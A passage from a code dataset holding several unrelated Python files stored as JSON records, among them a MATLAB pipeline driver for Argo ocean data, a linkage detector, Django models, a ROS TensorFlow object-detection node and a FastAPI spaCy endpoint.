var2use,\n '<PY:FOLDER2USE>': folder2use, \n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR>': f'{year_end_TC}',\n })\n\n## A04: filters using masks\nif ('A04' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A04')\n\n matlab_run('A04_filterUsingMasks.m', {\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A05: divides profile in two groups:\nif ('A05' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A05')\n\n ## A05: Hurricane profiles\n matlab_run('A05_splitHurricaneProfiles.m', {\n '<PY:GRID_VAR_FN>': folder2use + '/Outputs/gridArgoProfHurricane_',\n '<PY:MASK_VALUE>': '0',\n '<PY:MASK_NAME>': 'NoHurMask.csv',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n ## A05: Non-hurricane profiles\n matlab_run('A05_splitHurricaneProfiles.m', {\n '<PY:GRID_VAR_FN>': folder2use + '/Outputs/gridArgoProfNonHurricane_',\n '<PY:MASK_VALUE>': '1',\n '<PY:MASK_NAME>': 'NoHurMask.csv',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A06: estimate biases due to: temporal mean, seasonal cycle and trend (amplitude)\nif ('A06' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A06')\n matlab_run('A06_estimateMeanField.m', {\n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR+1>': f'{year_end_TC+1}',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A07: subtract mean for non-hurricanes\nif ('A07' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A07')\n matlab_run('A07_subtractMean.m', {\n '<PY:GRID_DATA_FN>': folder2use + '/Outputs/gridArgoProfFiltered_',\n '<PY:RES_DATA_FN>': folder2use + '/Outputs/gridArgoRes_',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n matlab_run('A07_subtractMean.m', {\n '<PY:GRID_DATA_FN>': folder2use + '/Outputs/gridArgoProfNonHurricane_',\n '<PY:RES_DATA_FN>': folder2use + '/Outputs/gridArgoResNonHurricane_',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A08: divides data in months\nif ('A08' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A08')\n matlab_run('A08_divideDataToMonths.m', {\n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR>': f'{year_end_TC}',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A09\nif ('A09' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A09')\n matlab_run('A09_extendedData.m', {\n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR>': f'{year_end_TC}',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A10\nif ('A10' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A10') \n # NA\n matlab_run('A10_filterLocalMLESpaceTime.m', {\n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR>': f'{year_end_TC}',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:CENTER_MONTH>': center_month,\n '<PY:OCEAN_BASIN>': '_NorthAtlantic',\n '<PY:FOLDER2USE>': folder2use, \n })\n # WP\n matlab_run('A10_filterLocalMLESpaceTime.m', {\n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR>': f'{year_end_TC}',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:CENTER_MONTH>': center_month,\n '<PY:OCEAN_BASIN>': '_WestPacific',\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A11\nif ('A11' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A11')\n fn = folder2use + '/Outputs/localMLESpaceTime_Depth_{d:03d}_{ws}_{mno}_{wsGP}_{cm:02d}_{sy}_{ey}{ob}.mat'\n for (ob, ob_mesh), depth in product(OB, range(1, depth_layers+1)):\n if not os.path.exists(fn.format(\n d=depth*10,\n ws=window_size,\n mno=min_num_obs,\n wsGP=windowSizeGP,\n cm=int(center_month),\n sy=year_start_TC,\n ey=year_end_TC,\n ob=ob)):\n print(ob, 'layer ',depth)\n current_layer = int(grid_lower) + (depth-1)*int(grid_stride)\n matlab_run('A11_localMLESpaceTime.m', {\n '<PY:CURRENT_LAYER>' : f'{current_layer}',\n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR>': f'{year_end_TC}',\n '<PY:DEPTH_INDEX>': f'{depth}',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:CENTER_MONTH>': center_month,\n '<PY:N_PARPOOL>': n_parpool,\n '<PY:OCEAN_BASIN>': ob,\n '<PY:OB_MESHGRID>': ob_mesh,\n '<PY:WINDOW_SIZE_GP>': windowSizeGP,\n '<PY:FOLDER2USE>': folder2use, \n })\n \n## A12\nif ('A12' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A12')\n fn = folder2use + '/Outputs/localMLESpaceTime_Depth_{d:03d}_{ws}_{mno}_{wsGP}_{cm:02d}_{sy}_{ey}{ob}.mat'\n for (ob, ob_mesh), depth in product(OB, range(1, depth_layers+1)):\n print(ob, 'layer ', depth)\n current_layer = int(grid_lower) + (depth-1)*int(grid_stride)\n matlab_run('A12_fitLocalMLESpaceTime.m', {\n '<PY:CURRENT_LAYER>' : f'{current_layer}',\n '<PY:GRID_VAR_FN>': folder2use + '/Outputs/gridArgoProfFiltered_',\n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR>': f'{year_end_TC}',\n '<PY:DEPTH_INDEX>': f'{depth}',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:CENTER_MONTH>': center_month,\n '<PY:N_PARPOOL>': n_parpool,\n '<PY:OCEAN_BASIN>': ob,\n '<PY:OB_MESHGRID>': ob_mesh,\n '<PY:WINDOW_SIZE_GP>': windowSizeGP,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n","repo_name":"jacoposala29/ARGO_code_JS","sub_path":"Codes_pipeline/pipeline_matlab_DG.py","file_name":"pipeline_matlab_DG.py","file_ext":"py","file_size_in_byte":10275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41699348423","text":"\"\"\"Routines for connective annotations\"\"\"\nimport re\n\nfrom collections import defaultdict\n\n\ndef all_indices(s, target, offset=0):\n listindex = []\n i = s.find(target, offset)\n while i >= 0:\n listindex.append(i + len(target))\n i = s.find(target, i + 1)\n return listindex\n\nITEM_FORMAT = '{}[{}:{}]'\n\n\ndef extract_item(connective, tokens, it, continuous=False):\n item = []\n text = ''\n for i in range(it, len(tokens)):\n text += tokens[i]\n if connective.startswith(text):\n item.append(ITEM_FORMAT.format(i, 0, len(tokens[i])))\n if connective == text:\n return i, item\n elif not continuous:\n break\n else:\n break\n return it, None\n\n\ndef offsets_to_items(offsets, tokens, text):\n items = []\n it = 0\n it_start = 0\n for start, end in offsets:\n item = []\n\n while end > it_start:\n it_end = it_start + len(tokens[it])\n\n if start < it_end:\n item.append(ITEM_FORMAT.format(\n it,\n max(start - it_start, 0),\n min(end - it_start, len(tokens[it]))\n ))\n if end < it_end:\n break\n\n it += 1\n it_start = it_end\n\n items.append(item)\n\n return items\n\n\ndef items_to_tuple(items):\n return tuple(','.join(item) for item in items)\n\n\ndef token_indices(word):\n \"\"\"Get indices of tokens in a word of linkage\"\"\"\n return (int(i.split('[')[0]) for i in word.split(','))\n\n\ndef list_of_token_indices(words):\n return [list(token_indices(x)) for x in words]\n\n\nclass LinkageFile(object):\n\n def __init__(self, linkage_path):\n self.linkage = defaultdict(set)\n self.linkage_with_types = set()\n self.linkage_type = defaultdict(dict)\n self.linkage_type2 = defaultdict(dict)\n self.structure_type = defaultdict(dict)\n self.type_stats = defaultdict(lambda: defaultdict(int))\n self.type_stats2 = defaultdict(lambda: defaultdict(int))\n self.rtype_counts = defaultdict(int)\n self.rtype_counts2 = defaultdict(int)\n self.type_counts = defaultdict(int)\n self.type_counts_comp = defaultdict(int)\n self.len_counts = defaultdict(int)\n\n with open(linkage_path, 'r') as f:\n items = [l.rstrip().split('\\t') for l in f]\n\n for plabel, words, indices, tp, tp2, sp in items:\n tp = int(tp)\n tp2 = int(tp2)\n sp = int(sp)\n\n cnnct = tuple(indices.split('-'))\n self.linkage[plabel].add(cnnct)\n self.linkage_type[plabel][cnnct] = tp\n self.linkage_type2[plabel][cnnct] = tp2\n self.structure_type[plabel][cnnct] = sp\n self.type_stats[words][tp] += 1\n self.type_stats2[words][tp2] += 1\n self.rtype_counts[tp] += 1\n self.rtype_counts2[tp2] += 1\n self.type_counts[words] += 1\n self.len_counts[words.count('-') + 1] += 1\n for w in words.split('-'):\n self.type_counts_comp[w] += 1\n\n for plabel, words, indices, _, _, _ in items:\n cnnct = tuple(indices.split('-'))\n if len(self.type_stats[words]) > 1:\n self.linkage_with_types.add((plabel, cnnct))\n\n def internal_print_type_stats(self, type_stats):\n d = defaultdict(int)\n dinst = defaultdict(int)\n for w, s in type_stats.items():\n d[len(s)] += 1\n dinst[len(s)] += self.type_counts[w]\n\n print('Type stats')\n for v, c in sorted(d.items()):\n print('{}: {}'.format(v, c))\n\n print('Type instances stats')\n for v, c in sorted(dinst.items()):\n print('{}: {}'.format(v, c))\n\n def print_type_stats(self):\n print('\\n1-level')\n self.internal_print_type_stats(self.type_stats)\n\n print('\\n2-level')\n self.internal_print_type_stats(self.type_stats2)\n\n print('\\n1-level total')\n for i, c in sorted(self.rtype_counts.items()):\n print('{}: {}'.format(i, c))\n\n print('\\n2-level total')\n for i, c in sorted(self.rtype_counts2.items()):\n print('{}: {}'.format(i, c))\n\n def all_words(self):\n \"\"\"Get identities of all single words appeared.\"\"\"\n words = set()\n for plabel, links in self.linkage.items():\n for link in links:\n for index in link:\n words.add((plabel, index))\n\n return words\n\n def __getitem__(self, plabel):\n \"\"\"Get linkages of a paragraph.\"\"\"\n return self.linkage[plabel]\n\n\nclass LinkageDetector(object):\n\n def __init__(self, connective_path):\n \"\"\"Creates likage detector by connective token file\"\"\"\n with open(connective_path, 'r') as f:\n self.connectives = {tuple(l.rstrip().split('\\t')) for l in f}\n self.components = set()\n for connective in self.connectives:\n for component in connective:\n self.components.add(component)\n\n def perfect_tokens(self, tokens, *, truth):\n \"\"\"get all connective candidates generated by known components\"\"\"\n list_of_tokens = list(self.detect_all(tokens))\n components = set()\n for indices in truth:\n for index in indices:\n components.add(index)\n\n for words, indices in list_of_tokens:\n if all(x in components for x in indices):\n yield words, indices\n\n def all_tokens(self, tokens, *, continuous=True, cross=False):\n \"\"\"get all connective candidates matched with connective lexicon by complete tokens\"\"\"\n # return a list\n list_of_tokens = list(self.detect_by_tokens(tokens,\n continuous=continuous,\n cross=cross))\n return list_of_tokens\n\n def detect_by_tokens(self, tokens, *, continuous=True, cross=False):\n \"\"\"get all connective candidates matched with connective lexicon by complete tokens\"\"\"\n for connective in self.connectives:\n for indices in self.extract_connective(0, connective, 0, tokens,\n continuous=continuous,\n cross=cross):\n yield connective, indices\n\n def detect_all_components(self, tokens):\n \"\"\"get all component candidates matched with component lexicon\"\"\"\n for component in self.components:\n for indices in self.extract_all_connective(0,\n (component,),\n 0,\n tokens,\n ''.join(tokens)):\n yield component, indices[0]\n\n def detect_all(self, tokens):\n \"\"\"get all connective candidates matched with connective lexicon\"\"\"\n for connective in self.connectives:\n for indices in self.extract_all_connective(0, connective, 0, tokens,\n ''.join(tokens)):\n yield connective, indices\n\n def extract_connective(self, idx, connective, it, tokens, *,\n items=None, continuous=False, cross=False):\n \"\"\"\n recursively extract connective candidates matched with the connective\n by complete tokens\n\n continuous: include continuous complete tokens\n cross: the components must cross a clause boundary\n \"\"\"\n if items is None:\n items = []\n\n if idx >= len(connective):\n yield items_to_tuple(items)\n else:\n for i in range(it, len(tokens)):\n offset, item = extract_item(\n connective[idx], tokens, i, continuous)\n if item is not None:\n items.append(item)\n if cross:\n while offset < len(tokens):\n if re.search(r'\\W', tokens[offset]) is not None:\n break\n else:\n offset += 1\n yield from self.extract_connective(\n idx + 1, connective, offset + 1, tokens,\n items=items, continuous=continuous)\n items.pop()\n\n def extract_all_connective(self, idx, connective, start, tokens, text, *,\n offsets=None):\n \"\"\"recursively detect all connective candidates matched with the connective\"\"\"\n\n if offsets is None:\n offsets = []\n\n if idx >= len(connective):\n items = offsets_to_items(offsets, tokens, text)\n yield items_to_tuple(items)\n else:\n component = connective[idx]\n while True:\n offset = text.find(component, start)\n if offset != -1:\n end = offset + len(component)\n offsets.append((offset, end))\n yield from self.extract_all_connective(\n idx + 1, connective, end, tokens, text,\n offsets=offsets)\n offsets.pop()\n\n start = offset + 1\n else:\n break\n","repo_name":"shaform/disambig","sub_path":"linkage/linkage.py","file_name":"linkage.py","file_ext":"py","file_size_in_byte":9517,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"73098234727","text":"# ---------- Import ----------\nimport copy\nimport sys\ninput = sys.stdin.readline\n\n# ---------- Function ----------\ndef simulation(rowSize, colSize, x, y, direction, area):\n # direction : North(0), East(1), South(2), West(3)\n \n cnt = 0\n iscleaning = copy.deepcopy(area)\n \n # UP, RGT, DN, LFT\n dx = [-1, 0, 1, 0]\n dy = [0, 1, 0, -1]\n \n while True:\n if iscleaning[x][y] == 0:\n iscleaning[x][y] = 1\n cnt += 1\n \n for i in range(4):\n nx = dx[i] + x\n ny = dy[i] + y\n \n if 0<=nx<rowSize and 0<=ny<colSize and\\\n area[nx][ny] != 1 and iscleaning[nx][ny] == 0:\n direction -= 1\n if direction < 0: direction = 3\n \n if area[x + dx[direction]][y + dy[direction]] == 0 and\\\n iscleaning[x + dx[direction]][y + dy[direction]] == 0:\n x += dx[direction]\n y += dy[direction]\n \n break\n else:\n nx = x - dx[direction]\n ny = y - dy[direction]\n \n if 0 <= nx < rowSize and 0 <= ny < colSize and area[nx][ny] != 1:\n x, y = nx, ny\n else:\n return cnt\n \n# ---------- Main ----------\nrow, col = map(int, input().split())\n# d: North(0), East(1), South(2), West(3)\nfirstX, firstY, direction = map(int, input().split())\narea = [list(map(int, input().split())) for _ in range(row)]\n\nresult = simulation(row, col, firstX, firstY, direction, area)\nprint(result)\n\n# ---------- Comment ----------\n# Cleaning condition\n# 0 is not clean, 1 is clean\n\n# 1. Cleaning current area\n# 2. all direction is already clean\n# 1. keep direction, go backward and STEP 1\n# 2. if can not move backward, then Stop\n# 3. not clean area exits any dicreation\n# 1. rotate left 90\n# 2. if front area is not clean, then move forward\n# 3. go STEP 1","repo_name":"miny-genie/BOJ","sub_path":"acmicpc_14503.py","file_name":"acmicpc_14503.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17663254129","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n\nclass Usuario (AbstractUser):\n VENDEDOR = 1\n USUARIO = 2\n \n ROLES = (\n (VENDEDOR, 'Vendedor'),\n (USUARIO, 'Usuario')\n )\n \n username = models.CharField(\n 'username',\n max_length=50,\n unique=True,\n error_messages={\n 'unique': 'Ya existe un usuario con este nombre de usuario.'\n }\n )\n \n USERNAME_FIELD = 'username'\n \n email = models.EmailField(\n 'email_address',\n unique=True,\n error_messages={\n 'unique' : 'Ya existe un usuario con este correo.'\n }\n )\n \n rol = models.IntegerField(choices=ROLES, default=USUARIO)\n \n is_verified = models.BooleanField(\n 'usuario', \n default=True, \n help_text='Verdadero si el usuario verificó su registro.'\n )\n \n is_active = models.BooleanField(default=True)\n \n is_staff = models.BooleanField(default=True)\n \n def __str__(self):\n return self.username\n \n def get_short_name(self):\n return self.username","repo_name":"RicardoWebProject/ControlBack","sub_path":"control/app/models/usuarios.py","file_name":"usuarios.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11342467082","text":"from django import forms\nfrom django.forms import ModelForm\n\nfrom listArch.models import BusinessType\n\n\nclass BusinessTypeForm(ModelForm):\n isProduct_based = forms.BooleanField(required=False)\n\n class Meta:\n model = BusinessType\n fields = ('key', 'isProduct_based', )\n widgets = {\n 'key': forms.TextInput(\n attrs={'class': 'form-control ', 'placeholder': 'Profil Adı', 'required': 'required',\n 'name': 'key'}),\n\n }\n","repo_name":"furkanyalcindag/oxit-listingArch","sub_path":"listArch/Forms/BusinessTypeForm.py","file_name":"BusinessTypeForm.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11884900095","text":"'''\nCreated on Sep 20, 2017\n\n@author: Burkhard A. Meier\n'''\n\nfrom Video2_MainWindow import Ui_MainWindow\n\nfrom PyQt5 import QtWidgets\n\n\ndef set_table_items():\n #### \n row = 0\n ui.tableWidget.setItem(row , 0, QtWidgets.QTableWidgetItem(\"item1\"))\n ui.tableWidget.setItem(1 , 1, QtWidgets.QTableWidgetItem(\"item2\"))\n ui.tableWidget.setItem(2 , 2, QtWidgets.QTableWidgetItem(\"item3\"))\n ###\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n \n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n \n # call function\n set_table_items()\n \n MainWindow.show()\n sys.exit(app.exec_())\n \n \n \n \n ","repo_name":"jantonisito/Python_GUI_Programming_Recipes_using_PyQt5","sub_path":"Section3_Enhancing_the_QT5_GUI _Functionality/Video2_Decouple_code_from_ui_2.py","file_name":"Video2_Decouple_code_from_ui_2.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2587593088","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport roslib\n# roslib.load_manifest('object_detection_tensorflow')\nimport sys\nimport rospy\nimport cv2\nimport time\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom sensor_msgs.msg import CompressedImage\n\nimport numpy as np\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\nfrom utils import ops as utils_ops\nfrom utils import label_map_util\nfrom utils import visualization_utils as vis_util\n\nfrom object_detection_tensorflow_msgs.msg import BBox, BBoxArray\n\n#Disable Tensroflow log\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nSKIP_FRAMES = 0\n\nclass ObjectDetectionTensorflow:\n def __init__(self):\n self.seq = 0\n self.ready = False\n self.counter = 0\n self.bridge = CvBridge()\n\n self.camera_topic = rospy.get_param('~camera_topic',\n \"/image_raw\")\n self.image_sub = rospy.Subscriber(self.camera_topic, Image,\n self.callback, queue_size=1)\n self.render = rospy.get_param('~render', True)\n if self.render:\n self.image_pub = rospy.Publisher(\"detections/image_raw/compressed\", CompressedImage, queue_size=5)\n self.model_name = rospy.get_param('~model_name')\n self.models_dir = rospy.get_param('~models_dir')\n self.path_to_ckpt = self.models_dir + '/' + self.model_name + '/frozen_inference_graph.pb'\n self.path_to_labels =rospy.get_param('~path_to_labels')\n self.num_classes = rospy.get_param('~num_classes', 90)\n self.threshold = rospy.get_param('~threshold', 0.5)\n self.rotate = rospy.get_param('~rotate', False)\n self.debug = rospy.get_param('~debug', False)\n self.bbox_pub = rospy.Publisher(self.camera_topic+\"/detections\", BBoxArray, queue_size=5)\n\n print(\"path_to_ckpt:\",self.path_to_ckpt)\n print(\"path_to_labels:\",self.path_to_labels)\n\n if self.path_to_ckpt == '' or self.path_to_labels == '':\n print(\"\\n\\nProvide requiered args: path_to_ckpt, path_to_labels\")\n print(\"Shutting down.\")\n exit(-1)\n\n self.label_map = label_map_util.load_labelmap(self.path_to_labels)\n self.categories = label_map_util.convert_label_map_to_categories(self.label_map,\n max_num_classes=self.num_classes, use_display_name=True)\n self.category_index = label_map_util.create_category_index(self.categories)\n\n print(\"Category map loaded:\")\n for i,n in zip (self.category_index.keys(),[str(_['name']) for _ in self.category_index.values()]):\n print(\"%4d %s\"%(i,n))\n\n self.detection_graph = tf.Graph()\n with self.detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n print(\"Loading model\")\n\n with tf.gfile.GFile(self.path_to_ckpt, 'rb') as fid:\n serialized_graph = fid.read()\n print(\"Parsing\")\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n self.sess = tf.Session(config=config, graph=self.detection_graph)\n\n # Get handles to input and output tensors\n ops = tf.get_default_graph().get_operations()\n print(\"Outputs:\")\n all_tensor_names = {output.name for op in ops for output in op.outputs}\n self.tensor_dict = {}\n for key in [\n 'num_detections', 'detection_boxes', 'detection_scores',\n 'detection_classes', 'detection_masks'\n ]:\n tensor_name = key + ':0'\n if tensor_name in all_tensor_names:\n print(\" \"+key)\n self.tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(\n tensor_name)\n self.image_tensor = tf.get_default_graph().get_tensor_by_name('image_tensor:0')\n\n self.ready = True\n print(\"Model loaded. Waiting for messages on topic:\",self.camera_topic)\n\n def run_inference_for_single_image(self, image):\n with self.detection_graph.as_default():\n\n if 'detection_masks' in self.tensor_dict:\n # The following processing is only for single image\n detection_boxes = tf.squeeze(self.tensor_dict['detection_boxes'], [0])\n detection_masks = tf.squeeze(self.tensor_dict['detection_masks'], [0])\n # Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.\n real_num_detection = tf.cast(self.tensor_dict['num_detections'][0], tf.int32)\n detection_boxes = tf.slice(detection_boxes, [0, 0], [real_num_detection, -1])\n detection_masks = tf.slice(detection_masks, [0, 0, 0], [real_num_detection, -1, -1])\n detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(\n detection_masks, detection_boxes, image.shape[0], image.shape[1])\n detection_masks_reframed = tf.cast(\n tf.greater(detection_masks_reframed, 0.5), tf.uint8)\n # Follow the convention by adding back the batch dimension\n self.tensor_dict['detection_masks_reframed'] = tf.expand_dims(\n detection_masks_reframed, 0)\n # Run inference\n output_dict = self.sess.run(self.tensor_dict,\n feed_dict={self.image_tensor: np.expand_dims(image, 0)})\n\n # all outputs are float32 numpy arrays, so convert types as appropriate\n output_dict['num_detections'] = int(output_dict['num_detections'][0])\n output_dict['detection_classes'] = output_dict[\n 'detection_classes'][0].astype(np.int64)\n output_dict['detection_boxes'] = output_dict['detection_boxes'][0]\n output_dict['detection_scores'] = output_dict['detection_scores'][0]\n if 'detection_masks_reframed' in output_dict:\n output_dict['detection_masks'] = output_dict['detection_masks_reframed'][0]\n return output_dict\n\n def callback(self, data):\n if not self.ready:\n # print(\"Received image, but not yet ready, still loading...\")\n return\n if self.counter < SKIP_FRAMES:\n self.counter = self.counter + 1\n print(\"Skipping %d/%d\" % (self.counter, SKIP_FRAMES))\n return\n else:\n self.counter = 0\n try:\n image = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n\n if self.rotate:\n #Rotate90\n image = np.transpose(image, (1, 0, 2))\n image = image[::-1,:,:]\n\n\n output_dict = self.run_inference_for_single_image(image)\n\n bboxes=BBoxArray()\n bboxes.camera_topic = self.camera_topic\n bboxes.header.stamp = data.header.stamp\n bboxes.header.frame_id = data.header.frame_id\n debug_list=[]\n for box, cl, score in zip(output_dict['detection_boxes'],\n output_dict['detection_classes'],\n output_dict['detection_scores']):\n if score>=self.threshold:\n b = BBox()\n b.header.seq = self.seq\n self.seq = self.seq+1\n b.header.stamp = data.header.stamp\n b.header.frame_id = data.header.frame_id\n b.xmin = box[0]\n b.ymin = box[1]\n b.xmax = box[2]\n b.ymax = box[3]\n b.score = score\n b.name = str(self.category_index[cl]['name'])\n b.id = cl\n b.camera_topic = self.camera_topic\n debug_list.append(self.category_index[cl]['name']+\" (%.1f) \"%(score*100))\n # print(box,cl,score,self.category_index[cl]['name'])\n bboxes.bboxes.append(b)\n self.bbox_pub.publish(bboxes)\n if self.debug:\n print(' '.join(sorted(debug_list)))\n if self.render:\n # Visualization of the results of a detection.\n vis_util.visualize_boxes_and_labels_on_image_array(\n image,\n output_dict['detection_boxes'],\n output_dict['detection_classes'],\n output_dict['detection_scores'],\n self.category_index,\n instance_masks=output_dict.get('detection_masks'),\n min_score_thresh=self.threshold,\n use_normalized_coordinates=True,\n line_thickness=8)\n # image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n msg = CompressedImage()\n msg.header.stamp = rospy.Time.now()\n msg.format = \"jpeg\"\n msg.data = np.array(cv2.imencode('.jpg', image)[1]).tostring()\n self.image_pub.publish(msg)\n except CvBridgeError as e:\n print(e)\n\n\ndef main(args):\n rospy.init_node('object_detection_tensorflow', anonymous=True)\n ic = ObjectDetectionTensorflow()\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"karolmajek/object_detection_tensorflow","sub_path":"object_detection_tensorflow/scripts/object_detection_tensorflow.py","file_name":"object_detection_tensorflow.py","file_ext":"py","file_size_in_byte":9519,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"71765338729","text":"# importing all dependencies\nimport os\nimport csv\n# defining path - i am using it this way because it was not working for me \nPyBank=os.path.join('/Users/gabrielazamora/Python Challenge/Python_Challenge/Homework/03-Python/Instructions/PyBank/Resources/budget_data.csv')\n\n# reading the csv file\nwith open(PyBank,'r') as csv_file:\n budget=csv.reader(csv_file)\n header=next(budget)\n print(header)\n# defining variables\n total_months=0\n net_total=0\n profit_and_losses=[]\n average_changes=[]\n date=[]\n \n for columns in budget:\n total_months=total_months+1\n net_total=net_total+int(columns[1])\n profit_and_losses.append(columns[1])\n date.append(columns[0])\n for x in range(1,len(profit_and_losses)):\n change=int(profit_and_losses[x])-int(profit_and_losses[x-1])\n average_changes.append(change)\n print(total_months,average_changes,date)\n #profit_loss_change=sum(average_changes)/len(average_changes)\n #print(profit_loss_change)\n #greatest_increase=max(profit_loss_change)\n #greatest_decrease=min(profit_loss_change)\n #greatest_increase_date=date[average_changes.index(greatest_increase)+1]\n #greatest_decrease_date=date[average_changes.index(greatest_decrease)+1]\n #print(greatest_decrease,greatest_increase,greatest_decrease_date)","repo_name":"ZamGabs/Python_Challenge","sub_path":"Homework/03-Python/Instructions/PyBank/PyBank.py","file_name":"PyBank.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44426811944","text":"# Python 3.10.6\n\nfrom fastapi import FastAPI\nfrom ml import NER\nfrom pydantic import BaseModel\nfrom typing import List\n\n\napp = FastAPI()\n\n@app.get(\"/\")\nasync def hello():\n '''\n Simple GET API\n '''\n return \"Hello World!\"\n\n# Create a model for Articles\nclass Article(BaseModel):\n content:str\n comments: List[str] = []\n\n\n@app.post(\"/article/\")\nasync def analyze_article(articles:List[Article]):\n '''\n Analyze an article and extract entities from it using Spacy \n '''\n \"\"\"\n request body: [\n {\n \"content\": \"Apple buys U.K. startup for $1 billion dollars\",\n \"comments\": [\"About money\",\"its good\"]\n }]\n\n Response body :\n {\n \"ents\": [\n {\n \"text\": \"Apple\",\n \"label\": \"ORG\"\n },\n {\n \"text\": \"U.K.\",\n \"label\": \"GPE\"\n },\n {\n \"text\": \"$1 billion dollars\",\n \"label\": \"MONEY\"\n }\n ],\n \"comments\": [\n \"ABOUT MONEY\",\n \"ITS GOOD\"\n ] } \n \n \"\"\"\n ents = []\n comments = []\n for article in articles:\n for comment in article.comments:\n comments.append(comment.upper())\n doc = NER(article.content)\n for ent in doc.ents:\n ents.append({\"text\":ent.text,\"label\":ent.label_})\n \n return {\"ents\":ents,\"comments\":comments}\n","repo_name":"parth-patel97/spaCy-NER-Articles-API","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74479483369","text":"# Slightly modified version of https://github.com/ray-project/ray/blob/master/rllib/models/tf/visionnet_v2.py from the Ray RLlib project\n#\nfrom ray.rllib.models.tf.tf_modelv2 import TFModelV2\nfrom ray.rllib.models.tf.misc 